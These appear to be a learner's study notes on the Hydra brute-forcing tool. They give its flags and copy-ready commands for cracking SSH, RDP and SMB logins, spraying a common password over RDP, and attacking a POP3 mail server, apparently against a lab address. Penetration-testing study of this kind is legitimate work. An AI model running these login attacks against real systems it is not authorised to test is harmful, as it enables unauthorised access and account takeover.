Hydra

Hydra is brute-forcing tool. We can basically automate login cracking for a wide range of protocols with it.

Basic Hydra Tags

-l - Single username -L - List of usernames -p - Single password -P - List of passwords

Brute-forcing SSH with Hydra

hydra -L user.list -P password.list ssh://10.129.42.197

Brute-forcing RDP with Hydra

hydra -L user.list -P password.list rdp://10.129.42.197

Brute-forcing SMB with Hydra

hydra -L user.list -P password.list smb://10.129.42.197

Note

We may get the following error describing that the server has sent an invalid reply while brute-forcing SMB. This is because we most likely have an outdated version of THC-Hydra that cannot handle SMBv3 replies. To work around this problem, we can manually update and recompile hydra or use another tool, the Metasploit framework.

Hydra - RDP Password Spraying

hydra -L usernames.txt -p 'password123' <ip> rdp

Hydra - Mail Server Password attack

hydra -L users.txt -p 'password123' -f <ip> pop3

notes

Explorer

Hydra

Basic Hydra Tags

Brute-forcing SSH with Hydra

Brute-forcing RDP with Hydra

Brute-forcing SMB with Hydra

Hydra - RDP Password Spraying

Hydra - Mail Server Password attack

Graph View

Table of Contents

Backlinks